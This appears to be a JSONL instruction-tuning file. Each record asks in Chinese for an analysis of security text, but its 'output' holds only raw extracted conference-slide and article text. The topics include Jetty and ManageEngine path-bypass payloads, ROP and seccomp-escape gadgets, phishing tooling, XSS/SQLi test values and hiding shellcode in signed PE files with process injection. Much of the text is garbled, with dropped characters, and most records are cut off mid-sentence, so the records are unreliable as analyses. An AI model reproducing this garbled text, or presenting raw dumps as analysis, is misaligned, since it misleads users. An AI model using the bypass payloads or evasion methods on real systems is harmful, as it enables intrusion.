{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAssisted Discovery of On-Chip Debug Interfaces Joe Grand, Grand Idea Studio, Inc. www.jtagulator.com Introduction  On-chip debug interfaces (such as JTAG) are a well-known hardware attack vector - Extract program code or data - Modify memory contents - Affect device operation on-the-fly - Provide chip-level control of a target device - Used as a stepping stone to further an attack  Identifying interfaces can sometimes be difficult and/or time consuming Goal  Create an easy-to-use, open source tool to simplify the process Design Specifications  Open source/hackable/expandable  Command-based interface  Input protection  Adjustable target voltage  Off-the-shelf components  Hand solderable PCB *** 2x5 headers compatible w/ Bus Pirate probes, http://dangerousprototypes.com/docs/Bus_Pirate Target I/F (24 channels) Propeller USB Input protection Level translation Status Op-Amp/DAC Demonstration Possible Limitations  No supported interface exists  Interface is physically disconnected - Cut traces, missing jumpers/0 ohm resistors  Interface isn't being properly enabled - Password protected, other pin settings needed  Signaling mismatch - Incorrect voltage levels, strong pull resistors on target  Abnormal target behavior due to \"fuzzing\" unknown pins *** Additional reverse engineering will be necessary Resources  www.jtagulator.com *** Schematics, source code, BOM, block diagram, Gerber plots, photos, videos, other documentation  www.parallax.com *** Assembled units, accessories *** Worldwide authorized distributors  http://oshpark.com/profiles/joegrand *** Bare boards", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStitching numbers Alex Moneger Security Engineer 10th of August 2014 Generating ROP payloads from in memory numbers Cisco Con!dential 2  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Work for Cisco Systems ! Now a developer in the Cloud Web Security Business Unit (big cloud based security proxy) ! Used to be a networking security architect ! Helped design the next generation datacenters for CWS ! Interested mostly in bits and bytes ! CCIE #36086 Who am I? Cisco Con!dential 3  2013-2014 Cisco and/or its a\"liates. All rights reserved. 1. Brief ROP overview 2. Automating ROP payload generation 3. Number Stitching 1. Goal 2. Finding gadgets 3. Coin change problem 4. Pros, Cons, Tooling 5. Future Work Agenda Cisco Con!dential 4  2013-2014 Cisco and/or its a\"liates. All rights reserved. Introduction Cisco Con!dential 5  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Generate payloads using numbers found in memory ! Solve the coin change problem to automatically generate ROP payloads ! If possible, use no gadgets from the target binary, only gadgets generated by libc stubs ! Automate the process TL;DR Cisco Con!dential 6  2013-2014 Cisco and/or its a\"liates. All rights reserved. ROP overview Cisco Con!dential 7  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Re-use instructions from the vulnerable binary ! Control #ow using the stack pointer ! Multi-staged: 1. Build the payload in memory using gadgets 2. Transfer execution to generated payload ! Only way around todays OS protections Principle Cisco Con!dential 8  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Useful instructions => gadgets ! Disassemble backwards from ret instruction ! Good tools available ! Number of gadgets to use is dependent upon target binary Finding instructions Cisco Con!dential 9  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Once payload is built in memory ! Transfer control by pivoting the stack ! Allows to redirect execution to a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Jetty WEB-INF 敏感信息泄露漏洞CVE-2021-34429 Eclipse Jetty是一个开源的servlet容器它为基于Java的Web容器提供运行环境 Jetty在9.4.40后修复了因为`%2e`导致的敏感信息泄露漏洞[CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164)但这个修复是不完全的通过下面三种方式可以进行绕过 - unicode形式URL编码`/%u002e/WEB-INF/web.xml` - `\\0`组合`.`导致的绕过`/.%00/WEB-INF/web.xml` - `\\0`组合`..`导致的绕过`/a/b/..%00/WEB-INF/web.xml` 影响版本9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5 参考链接 - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm - https://xz.aliyun.com/t/10039 ## 漏洞环境 执行如下命令启动一个Jetty 9.4.40 ``` docker compose up -d ``` 服务启动后访问`http://your-ip:8080`可以查看到一个example页面 ## 漏洞复现 直接访问`/WEB-INF/web.xml`将会返回404页面 ![](1.png) 使用`/%u002e/WEB-INF/web.xml`来绕过限制下载web.xml ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Ghost Phisher categories: Information Gathering tags: [kali linux,wireless attacks,information gathering,ghost phisher] date: 2016-10-25 11:50:00 --- 0x00 Ghost Phisher介绍 ------------- Ghost Phisher是一个使用Python编程语言和Python Qt GUI库编写的无线和以太网安全审计和攻击程序可以伪造DNS服务器DHCP服务器HTTP服务器并且内置自动抓取和记录认证信息的功能模块这个程序可用于制作蜜罐也可用于钓鱼安全测试的相关工作 Ghost Phisher目前支持以下功能 ```plain HTTP服务器 内置RFC 1035 DNS服务器 内置RFC 2131 DHCP服务器 网页托管和凭证记录器网络钓鱼 Wifi接入点模拟器 会话劫持被动和以太网模式 ARP缓存欺骗用于MITM和DOS攻击 使用绑定的Metasploit进行渗透 使用SQlite数据库进行自动凭证日志记录 更新支持 ``` 工具来源https://code.google.com/p/ghost-phisher/ [Ghost Phisher主页][1] | [Kali Ghost Phisher Repo仓库][2] - 作者Saviour Emmanuel Ekiko - 证书GPLv3 0x01 Ghost Phisher功能 --------------- ghost-phisher - 用于网络钓鱼和渗透攻击的图形用户界面套件 <!--more--> 0x02 Ghost Phisher用法示例 ----------------- YouTube[How to create fake wifi hotspot (ghost phisher) using kali linux 2][3] ```shell root@kali:~# ghost-phisher ``` ![ghost-phisher.gif][4] [1]: https://code.google.com/p/ghost-phisher/ [2]: http://git.kali.org/gitweb/?p=packages/ghost-phisher.git;a=summary [3]: https://www.youtube.com/watch?v=QpMZXp1NryE [4]: https://www.hackfun.org/usr/uploads/2016/10/690577029.gif", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFree Your Mind The NMRC Info/Warez Panel Our Agenda  Intro  hellNbak  Hack FAQ  jrandom, Weasel  Ncrypt/Ncovert  Simple Nomad  Political Rant  Sioda an Cailleach  Win32 Buffer Overflow Eggs  Cyberiad  nmrcOS  Inertia  Panel Q&A  Closing  Simple Nomad Special Note No photography of the crowd No questions from the press during Q&A Hack FAQ jrandom [jrandom@nmrc.org] Weasel [weasel@nmrc.org] faq@nmrc.org Hack FAQ Past  Why it was created  How did it grow  Where is it going Hack FAQ Present  XHTML & CSS  New Content  Active Maintainers Hack FAQ Future  Multiple formats  Multiple languages  Even more content NCrypt / NCovert Simple Nomad [thegnome@nmrc.org] Overview of Ncrypt  Symmetric file encryption/decryption  Top 3 AES candidates  Secure coding features  Anti-Forensics  2 file wiping techniques  Potential risk areas Overview of NCovert  Stealth communications tool  Levering features of TCP/IP  Potential risk areas Live Demo of Ncovert  Multiple formats A Political Rant Sioda an Cailleach Win32 Buffer Overflow Eggs Cyberiad [cyberiad@nmrc.org] nmrcOS Inertia [inertia@nmrc.org] nmrcOS@nmrc.org http://nmrcos.nmrc.org/ nmrcOS  Main features  Discussed in detail Sunday at 14:00  ISO included on DC11 conference CD Panel Q&A  Mouth-breathing Reporters: Let the community ask the questions, well get to your ilk later. A Summary Rant Simple Nomad [thegnome@nmrc.org] Thanks  From all of NMRC to you: Cask3t, Cyberiad, Daaihliuh, Grace Clovia Terre, hellNbak, Inertia, jrandom, Maniac, Phuzzy L0gik, Rat Toe, Ring Zero, Simple Nomad, Sioda an Cailleach, Tanshiai, Weasel  For your support and best wishes: Attrition, Wiretrip, Ghetto Hackers, cDc, and many others  And thanks to the underground for your years of support! R.I.P., Jitsu-Disk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 20 SAFES AND CONTAINERS  INSECURITY DESIGN EXCELLANCE DESIGN DEFECTS IN SECURITY PRODUCTS THAT HAVE REAL CONSEQUENCES IN PROTECTING LIVES AND PROPERTY GUN SAFES: A CASE STUDY  GUN SAFES AND PROPERTY SAFES ARE SOLD TO STORE WEAPONS  MANY ARE NOT SECURE  ANALYSIS OF INSECURITY  Boltworks and mechanism  Biometrics  Key Locks SECURITY REPRESENTATIONS  SECURE FOR STORING WEAPONS  CERTIFIED BY CALIFORNIA DOJ  PROTECT KIDS FROM GUNS MANUFACTURERS, SECURITY, and ENGINEERING  Many manufacturers do not understand bypass techniques  Many imports, no security, just price  Large reputable companies sell junk  Representations that are not true by:  Manufacturers  Dealers  Retail INSECURITY ENGINEERING: A DEFINITION  Intersection of mechanical and security engineering  Must have both mechanics and security  Must understand bypass techniques and design against at all stages in process  Develop a new way of thinking by Manufacturers  Problem: Engineers know how to make things work but not how to break them MYTHS ABOUT SECURITY AND PRODUCT DESIGN  It is patented  Engineers think the product is secure  Product has been sold for many years  No known bypass tools or techniques  Product meets or exceeds standards  Testing labs have certified the product  Government labs say its secure  No consumer complaints STANDARDS: THE PROBLEM  MEET ALL STANDARDS BUT THE LOCK OR SAFE CAN BE EASILY OPENED  Standards are not up-to-date  Not test for many methods of attack  Consumer relies on standards for security  Just because you meet standards does not mean the lock or safe is secure  STANDARDS CAN MISLEAD THE PUBLIC  GUN LOCK AND SAFE STANDARDS ARE INADEQUATE AND DO NOT PROTECT CALIFORNIA DOJ STANDARDS ESSENTIALLY WORTHLESS REGULATORY GUN SAFE STANDARDS - CAL DOJ Section 977.50 of the CA Code of Regulations  Shall be able to fully contain firearms and provide for their secure storage;  Shall have a locking system consisting of at minimum a mechanical or electronic combination lock. The mecha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGeneric, Decentralized, Unstoppable Anonymity: The Phantom Protocol DEFCON 16 Presentation Magnus Bråding 2008 Short Author Presentation Magnus Bråding  Swedish security researcher (Fortego Security)  10+ years in the security business  Central contributor and driving force behind woodmann.com reverse engineering community Project Background (why is this interesting?) Big upswing in anti online privacy measures during last couple of years  Huge pressure from media companies  ISPs tracking and throttling arbitrary traffic  Data retention laws  Draconian laws for tracking and punishing P2P users  Abuse and misuse of global network blacklists, under the cover of being child porn related, while in reality being much more arbitrary censorship  Recent EU law proposal to register, track and regulate all bloggers!  Dictatorships and other regimes with oppressed people censoring and tracking Internet use on an increasingly larger scale A huge upcoming demand for anonymity seems unavoidable! Existing anonymization solutions are in many ways not well suited for this upcoming demand and the circumstances surrounding it There is no real standard for anonymization, like BitTorrent is for P2P A perfect opportunity to get it right with a new solution, from the start! Goals of the Project To be a good reference for future work within the field of anonymization To inspire further discussion about the optimal requirements for the future anonymization demand To be a starting point and inspiration for the design and development of a global de facto standard for generic anonymization Not to be a complete detailed specification ready to be implemented, but rather to be built upon Limitations The protocol is designed to work in any network environment as long as no single attacker is able to eavesdrop all participating nodes in a correlated fashion, or directly controls a large majority of all nodes in the network  Such an attacker will still never be able to see what participating nodes a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### C 沙盒逃逸orw介绍 有些时候 pwn 题目中为了增加难度会使用类似 [seccomp](https://en.wikipedia.org/wiki/Seccomp) 的函数来禁用一部分系统调用往往会把 execve 这种系统调用禁用掉基本上拿 shell 是不可能了但是我们 pwn 题是面向 flag 的所以还是可以通过 orw open-read-write 的方法来读出 flag 的在栈上的 orw 和 普通 rop 其实没有什么特别大的区别这里主要谈一谈堆利用中的白名单绕过 一般来说开启了白名单的堆利用类题我们会在劫持了某钩子函数如 __free_hook 或 got 表之后考虑实现 orw这个时候我们只可以注入一个 gadget一般来说我们希望这个 gadget 能够实现栈迁移一种比较通用的做法是利用 setcontext 函数其在 libc-2.29 中实现为 ``` .text:0000000000055E00 ; __unwind { .text:0000000000055E00 push rdi .text:0000000000055E01 lea rsi, [rdi+128h] ; nset .text:0000000000055E08 xor edx, edx ; oset .text:0000000000055E0A mov edi, 2 ; how .text:0000000000055E0F mov r10d, 8 ; sigsetsize .text:0000000000055E15 mov eax, 0Eh .text:0000000000055E1A syscall ; LINUX - sys_rt_sigprocmask .text:0000000000055E1C pop rdx .text:0000000000055E1D cmp rax, 0FFFFFFFFFFFFF001h .text:0000000000055E23 jnb short loc_55E80 .text:0000000000055E25 mov rcx, [rdx+0E0h] .text:0000000000055E2C fldenv byte ptr [rcx] .text:0000000000055E2E ldmxcsr dword ptr [rdx+1C0h] .text:0000000000055E35 mov rsp, [rdx+0A0h] .text:0000000000055E3C mov rbx, [rdx+80h] .text:0000000000055E43 mov rbp, [rdx+78h] .text:0000000000055E47 mov r12, [rdx+48h] .text:0000000000055E4B mov r13, [rdx+50h] .text:0000000000055E4F mov r14, [rdx+58h] .text:0000000000055E53 mov r15, [rdx+60h] .text:0000000000055E57 mov rcx, [rdx+0A8h] .text:0000000000055E5E push rcx .text:0000000000055E5F mov rsi, [rdx+70h] .text:0000000000055E63 mov rdi, [rdx+68h] .text:0000000000055E67 mov rcx, [rdx+98h] .text:0000000000055E6E mov r8, [rdx+28h] .text:0000000000055E72 mov r9, [rdx+30h] .text:0000000000055E76 mov rdx, [rdx+88h] .text:0000000000055E76 ; } // starts at 55E00 ``` 当然其他版本也大同小异可见在这个函数中有对 rsp 的赋值如果我们可以控制 rdx就可以控制 rsp 实现栈迁移了 ### C 沙盒逃逸例题 #### Balsn_CTF_2019-PlainText ##### 分析 在 orw 之前的利用这里不再赘述请见Glibc Heap 利用目录下的堆中的 Off-By-One中对此题的分析 比较讨厌的是在 libc-2.29 下free 函数不会再将 rdi 赋值给 rdx我们无法直接控制 rdx仅能控制 rdi幸好比较巧合的在本题的 libc 中有这样一个 gadget ``` 0x12be97: mov rdx, qword ptr [rdi + 8]; mov rax, qword", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Zoho ManageEngine ADSelfService Plus 偶然看到这篇章勾起了好奇 https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine- adselfservice-plus.html 这说件上传和命令注没修我想着看他上修复的权限绕过感觉有问题于是找了个最新版测试 结果找错了版本了天活我在他中官下载的最新版为6115版本 下讲的都是6115才回出现的问题实际上官最新为6117版本在6116版本的安全过滤器 范围直接变为* 前 2 导致很多都洞法利了这个过滤器看了下基本没法绕你访问的URI不在安全配置定义 直接报错参数名不致参数值不在限定范围直接报错基本上exclude也利不了 这篇章提到 权限绕过bypass 3 官写了个getNormalizedURI 来修复权限绕过我当时看着就有问题我们先跟下这个过滤器 在web.xml定义了个 filter Plain Text 复制代码 <filter> <filter-name>ADSFilter</filter-name> <filter-class>com.manageengine.ads.fw.filter.ADSFilter</filter-class> </filter> <filter-mapping> <filter-name>ADSFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>FORWARD</dispatcher> <dispatcher>REQUEST</dispatcher> </filter-mapping> 1 2 3 4 5 6 7 8 9 10 4 ADSFilter代码如下 这意味着我们必须是 doSubFilters 法返回为正才能通过这个过滤器 在 doSubFilters 法中存在这样段 跟 RestAPIUtil.isRestAPIRequest Java 复制代码 public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { HttpServletRequest request = (HttpServletRequest)servletRequest; HttpServletResponse response = (HttpServletResponse)servletResponse; boolean haveSetCredential = RestAPI.setUserCredentialsForRestAPI(request, this.filterParams); if (this.doSubFilters(servletRequest, servletResponse, filterChain)) { filterChain.doFilter(request, response); } if (haveSetCredential) { AuthUtil.flushCredentials(); } } 1 2 3 4 5 6 7 8 9 10 11 12 13 Java 复制代码 if (RestAPIUtil.isRestAPIRequest(request, this.filterParams) && !RestAPIFilter.doAction(servletRequest, servletResponse, this.filterParams, this.filterConfig)) { return false; } 1 2 3 5 此处直接使 getRequestURI 来获取请求路径使 \"/RestAPI/.*\" 来匹配所以就有了最开始的 /./RestAPI/xxx 来绕过新版增加了个安全法 getNormalizedURI 来处理路径 Java 复制代码 public static boolean isRestAPIRequest(HttpServletRequest request, JSONObject filterParams) { String restApiUrlPattern = \"/RestAPI/.*\"; try { restApiUrlPattern = filterParams.optString(\"API_URL_PATTERN\", restApi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n主办方 赞助商 多元化新零售业务安全防护  瑞数动态安全超融合解决方案 瑞数信息 吴剑刚 3 应用变化 API应用 APP应用 Web应用 微信/小程序 Web攻击防护 APP/API防护 微信/小程序防护 全应用融合防护 需求变化 随着数字化业务深化导致应用安全防护需求不断升级 组合攻击 自动化攻击 人工渗透 手段变化 0day漏洞 已知漏洞 业务威胁 威胁变化 规则防护 安全联防 主动防御 理念变化 4 注数据来源瑞数信息Bots自动化威胁报告 5 App/JSON 6% App/XML 26% Text/XML 14% Text/HTML 54% API访问流量占比46% App/JSON 69% Text/XML 14% Text/HTML 17% API访问流量占比83% 5年时间网站 访问流量中API 流量从46%增 长到83% 6 利用合法业务逻辑 模拟合法操作 大量使用工具 高效率和规模化 多源低频多特征 传统安全很难识别 批量注册撞库及暴力破解 恶意爬取金融产品敏感数据 虚假交易和交易篡改 漏洞扫描和零日漏洞探测 营销资源恶意抢占薅羊毛 在线交易 对外业务 市场营销活动 数据服务 注册及登录 7 全渠道全功能 大数据分析威胁透视 通过动态技术针对自动 化攻击建立全方位纵深防 御体系从而形成事前 事中事后安全风险闭环 消除用户信息安全体系建 设中的安全孤岛问题 适应当前复杂多变的网络 和应用环境保障信息系 统的动态长期安全 Web/H5 APP 微信/小程序 API 动 态 安 全 超 融 合 平 台 业务场景 Web攻击防护 APP攻击防护 API 管理/保护 业务攻击防护 功能层 动态令牌 动态验证 动态混淆 动态封装 设备指纹 威胁模型 生成信誉库 攻击者画像 信誉数据输 入输出 定时器 软拦截 动态挑战 CC防御 基于有监督和无监督学习模式下的智能AI识别引擎 API管理/防护 动态WAF Bot管理 AI + 动 态 策 略 层 可编程对抗 业务威胁感知 动态技术 1 数据共享 第三方数据输入/输出 瑞数情报数据 APP数据 API网关数据 接入渠道 8 浏览器 移动App 对应用层的HTML代码进行 动态变幻 动态验证 运行环境验证以甄别人还是自动化 如对抗模拟浏览器及自动化的攻击 动态安全防护 动态封装 网页底层代码变换并封装隐藏攻击入口 如对抗一般扫描其及爬虫 动态混淆 提交的客户端敏感数据进行混淆变化保 护数据防篡改 如对抗中间人攻击 动态令牌 一次性的页面动态令牌确保执行正确的 业务逻辑 如对抗重访攻击或越权 Web/APP 服务器 API 应用 服务器 9 资产 管理 访问行 为管控 攻击 防护 敏感数 据管控 Ø API资产自动识别梳 理和分组 Ø API资产生命周期管理 ØAPI敏感数据识别 Ø敏感数据脱敏和防护 ØAPI安全攻击防护 ØAPI请求参数合规管控 ØAPI运行情况监控 ØAPI请求访问行为监控 ØAPI异常行为管控 10 11 12 简单脚本 和工具 具备JS解析 能力的工具 脚本驱动 浏览器 录屏 操作 真人操作 动态验证用户环境行为拦截 无法解析动态令牌直接拦截 动态挑战可编程对抗 设备指纹行为分析 业务威胁建模信誉拦截 超融合方案防护效果 14 防漏洞探测 防零日漏洞 防应用 DDoS 防应用漏洞攻击 应用安全 数据管控 防爬虫 防内鬼 防数据遍历 防拖库 业务安全 防撞库/暴力破解 防批量注册 防虚假交易 防薅羊毛 动态对抗 动态挑战 可编程响应 软拦截 行为管控 15 业务无感知无需代码修改 风控前置辅助业务风控 构建用户画像辅助业务经营分析 内置威胁模型覆盖 OWASP 21种 自动化威胁场景 持续对抗软拦截防逆向 16 10亿 + 账户 35亿 + 线上交易 银行 电信 汽车 制造 在线支付 电商 教育 航空 300亿 + 安全访问 每天阻挡 100亿 + 自动化攻击 450 + 客户 THANKS 谢 谢! 安世加专注于络安全业通过互联平台线下沙 峰会才招聘等多种形式致于创建亚太地区最好的甲 双交流学习的平台培养安全才提升业整体素 质助推安全态圈的健康发展 官站 https://www.anshijia.net.cn 微信公众号asjeiss", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAndroid weblogin: Google's Skeleton Key Craig Young, Tripwire VERT # whoami I research, identify, and disclose vulnerabilities as a senior researcher in Tripwire VERT. I enjoy long bike rides, breaking things which fail to sanitize input, and building furniture with my wife on the weekend. DISCLAIMER: I am definitely not an Android developer. Talk Overview (tl;dr) 1. Android trades security for convenience 2. weblogin: can bypass password prompts 3. Security tools do not detect token egress 4. 1 token can fully compromise Google Apps About weblogin:  Android Token Type: weblogin:service=youtube&continue=https://www.youtube.com/  Grants cookies for the desired service  Acts in lieu of password entry Abusing weblogin:  Cookies obtained are not limited by service  App may ask for YouTube and then read your email  Android permission prompts are unclear  i.e. a YouTube token also gives access to GMail  Prompt is once per app per token type  Root or physical access is also token access 1. Retrieve weblogin: token for domain admin 2. Access domain control panel 3. ??? 4. PROFIT!!!! Attacking Google Apps Using the Skeleton Key  Admin weblogin: gives a lot of control:  Disable 2-Step Verification / Reset Password  Add Super-Users*  Create and Modify Privileges/Roles  Create/Control Mailing Lists on Target Domain  Reveal Temporary Passwords *Google tried to fix this for my talk. See demo for details. What About GMail?  Personal Google accounts are also at risk:  Full access to Google Drive, Calendar, GMail, etc.  Ability to reset password (when 2SV is not enabled)*  Data dump (Google Takeout)* * Addressed by Google in response to my talk More Access  Remote install of apps from Google Play  Authenticate through Federated Login  Create Google Sites 1. Malware + AccountManager API 2. Query accounts.db (Using root exploit) 3. Physical Access (Chrome auto sign-in) 4. Chip-Off Forensics (Memory extraction) Ways to Obtain weblogin: Stock Viewer PoC Objectives 1. Make Token Stealing", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nREST API安全测试的思路 基于Swagger的REST API自动化安 全测试实践 贾玉彬 Gary Gary_jia@rapid7.com 大纲  由应用安全说起  传统REST API安全测试  基于Swagger的REST API 的安全测试 在SDLC中尽早发现和修复安全问题 30X 15X 10X 5X 2X Cost Source: NIST Production System testing Integration/ component testing Coding Requirements 不同的团队不同的目标 DevSecOps Image : Pete Cheslock at #DevOpsDaysAustin. Everyone is responsible for security with the goal of safely distributing security decisions at speed and scale It does not have to be like this: 传统的REST API安全测试 REST API  REST  REpresentational State Transfer  REST描述的是客户端和服务端的一种交互 形式REST本身不实用实用的是如何设 计RESTful风格 API  传输资源的形式一般是JSON和XML RESTful结构的好处 RESTful通过一套统一的接 口为Web, iOS和Android提 供服务 *图片来自互联网 REST API安全问题会带来的后果  接口被滥用消耗系统资源  数据泄露  伪造/篡改数据  应用被仿制  引入其他安全问题 REST API是可被攻击的  REST API是可以被常用的攻击方法进行攻击 的如注入XSSCSRFXML Entity攻击等 等 REST API测试  通常没有WEB界面与之进行交互通过HTTP的各种终端工 具或自己编写HTTP客户端脚本与服务端通讯来进行测试  通过变化API调用参数组合变化API功能调用顺序实现 全面和各种复杂组合的调用  针对安全测试也存在同样的问题 以移动应用为例的测试过程手工  安装配置代理  配置测试移动设备  准备测试用数据  手工测试 安装并设置代理配置移动设备 手工测试REST APISQL注入为例  测试是否存在注入漏洞  例如使用PUT方法更新用户档案  请求中包含参数值first_name) URL: http://192.168.202.131/api/user/1 Method: PUT Parameter name: first_name Attack values: test 手工测试REST APISQL注入为例 Request 1 使用test把两个单引号注入 到请求 手工测试REST APISQL注入为例 Response 1 用户档案成功提交 手工测试REST APIXSS为例  测试是否存在XSS漏洞  例如使用PUT方法更新用户档案  请求中包含参数值first_name) URL: http://192.168.202.131/api/user/1 Method: PUT Parameter name: first_name Attack values: <script>alert(1)</script> 手工测试REST APIXSS为例 Request 在请求中使用 <script>alert(1)<script>把一 个脚本标签注入到first_name 参数值 手工测试REST APIXSS为例 使用DAST工具测试REST API  手工测试REST API是个很具挑战性的工作  大部分的DAST工具都需要training mode对 REST API进行测试使用复杂的JSONXML GWT结构  方法导入预先录制的流量文件进行测试 以AppSpider + BurpSuite为例  BurpSuite使用广泛  AppSpider可以接受各种录制的流量并且可 以识别JSONXMLGWTAMF参数和值 不需要使用training mode DEMO 基于SWAGGER的REST API的安全测试 基于Swagger的REST API  Swagger是一个简单又强大的REST API文档 生成工具  标准的语言无关的通过它计算机和人 类无需阅读代码文档或者监测网络流量 就能发现并理解Web服务 Swagger REST API DEMO 运行AppSpider并选择Swagger Utility 导入Swagger JSON文件 API function calls 操作API参数 创建新的扫描配置 总结 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n微软签名缺陷利用 - 老但有用的技术 0x00 前言 这项技术原理很简单一般正规公司开发的PE文件都有数字签名但是微软提供的签名技术并没有签 名所有数据还有部分结构体没有纳入签名计算因此我们可以修改这些结构体放入我们的 shellcode而不影响签名校验 这项技术到底有多大用呢我的结论是作用只能算锦上添花不是雪中送碳的技术这2天有个老哥把这 项技术写成了适合CS使用的.net和BOF程序我们看看他的程序结构 0x00 SigFile红队工具分析 首先我们通过作者提供的SigFile程序把shellcode通过加密保存在正规的PE文件中然后上传到目标服 务器在这一步会面临AV/EDR的静态扫描大部分杀软发现是正规签名比如微软签名就直接放过 了因此这一步落地被杀的几率不高但是因为这项技术至少可以追溯到2013年以前也就是说10年老 技术了因此被杀软针对性查杀的可能性还是较高的这就是攻防对抗随着时间推移没有一招鲜吃 遍天的可能这一步我们按照1-10分的查杀可能我打7分 接下来就是使用SigLoad读取被嵌入正常PE的shellcode这一步中sigLoad是用.net和bof开发的可以在 内存中使用不落地因为正常的PE内存中展开是没有包含我们写shellcode的哪些字段因此我们读取方 法和读取一个文本类似就是打开文件找到物理偏移然后读取再解密加载执行唯一的优势是 我们的这个文本是被正规签名的PE这样可以更OPSEC一点 读取完shellcode就是执行shellcode了这一步就和本文提到的技术没有任何关系了sigLoad使用的 是常规的远程进程注入OpenProcess+VirtualAllocEx+WriteProcessMemory+CreateRemoteThread 这样的一连串的API调用被杀的几率很大 因此我们从功能上拆解下sigFile这个工具shellcode插入高信誉签名PESigLoad加载合成的PE并执行 shellcode这就是这个工具的2大功能涉及到本文提到的签名漏洞问题的核心就前2个功能因此根据 我个人判断这项技术杀软对抗的作用其实没想想的那么大 0x00 使用测试 我们先利用SigFile制作一个包含shellcode的正规签名PE Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-10 No. 1 / 5 - Welcome to www.red-team.cn 成功不改变数字签名的情况下加入了shellcode注意签名没变但是文件hash变了我们使用cs试试 看能不能正常使用 我们先看系统有没有打补丁这个补丁13年就出了https://docs.microsoft.com/en-us/security-update s/SecurityAdvisories/2014/2915720?redirectedfrom=MSDN很关键的一点就是不默认开启 通过查看非管理员权限也是可以的 reg query x86 HKLM\\Software\\Microsoft\\Cryptography\\Wintrust\\Config reg query x64 HKLM\\Software\\Wow6432Node\\Microsoft\\Cryptography\\Wintrust\\Config 如果上面注册表路径存在则检测EnableCertPaddingCheck值是否为11为开启 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-10 No. 2 / 5 - Welcome to www.red-team.cn 默认没有相关配置我们使用CS试试作者的SigLoader加载shellcode试试一来就给我报了个这个错 然后我把里面冗余的代码删了删例如代码中当前线程执行shellcode的代码删除了因为没有用作 者使用的是Loader.cs中的远程进程注入然后把原来使用的.net4.6.1调低到4.5再编译就可以了 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-10 No. 3 / 5 - Welcome to www.red-team.cn 显示成功了但是一注入就进程崩溃建议大家谨慎使用于是我把它注入的那段代码改了但是尼瑪 還是失败最后我对比解密的shellcode发现少了一截垃圾代码于是我读了下加解密代码发现作者 偏移搞错了于是没把加密的shellcode读完解密出来的也就不全了于是改了改代码ok再测试 最后成功了 0x00 总结 由于浪费我1个多小时去找代码bug我只能评价垃圾垃圾垃圾看朋友圈有其他同学测试成", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSSD Data Evapora+on DEF CON 21 August 2, 2013 Bio Data Remanence Deleted Data  On magne+c hard disks, data remains +ll it is overwriEen  Image from www.howstuffworks.com DEMO on Windows  Observing data on a magne+c hard disk aMer  Moving to Recycle Bin  Emptying Recycle Bin  FormaOng Drive (Quick)  FormaOng Drive (Slow) Forensics & Data Recovery  We can recover deleted data  Find evidence of crimes  Even aMer a format  Very few criminals know enough to use encryp+on or forensic erasure Useful Free Data Recovery Tools  Recuva for PC  Disk Drill for Mac SSDs  From hEp://www.isuppli.com/Abstract/P28276_20130322152341.pdf How SSDs Work  Data can be read and wriEen one page at a +me, but can only be erased a block at a +me  Each erasure degrades the flashit fails around 10,000 erasures  From hEp://www.anandtech.com/ show/2738/5 Garbage Collec+on  SSD controller erases pages all by itself, when it knows they are empty  The TRIM command is sent to the SSD when a file is deleted  But only if you use a the correct OS, Par++on type, and BIOS seOngs  Yuri Gubanov calls this Self-Corrosion  I call it Data Evapora;on Demo on Mac: Disk Drill  Deleted files from desktop evaporate in 30-60 min Demo on PC  Save data on an SSD  Watch it evaporate!  How to test TRIM  fsu;l behavior query DisableDeleteNo;fy  Zero = TRIM enabled When Does TRIM Work?  BIOS: Drive must be SATA in AHCI mode, not in IDE emula+on mode  SSD must be new (Intel: 34 nm only)  Windows 7 or later  NTFS volumes, not FAT  Mac OS X 10.6.8 or later  Must be Apple-branded SSD When Does TRIM Work?  External Drives must use SATA or SCSI, not USB  PCI-Express & RAID does not support TRIM  From hEp://forensic.belkasoM.com/en/why-ssd-destroy-court-evidence Expert Witness Tes+mony Experience  In court, an expert witness can state an opinion  Must be based on personal experience  I read it in a book NO  A teacher said it in a class NO  I know this because I tested it YES  So forensic examiners do a lot of 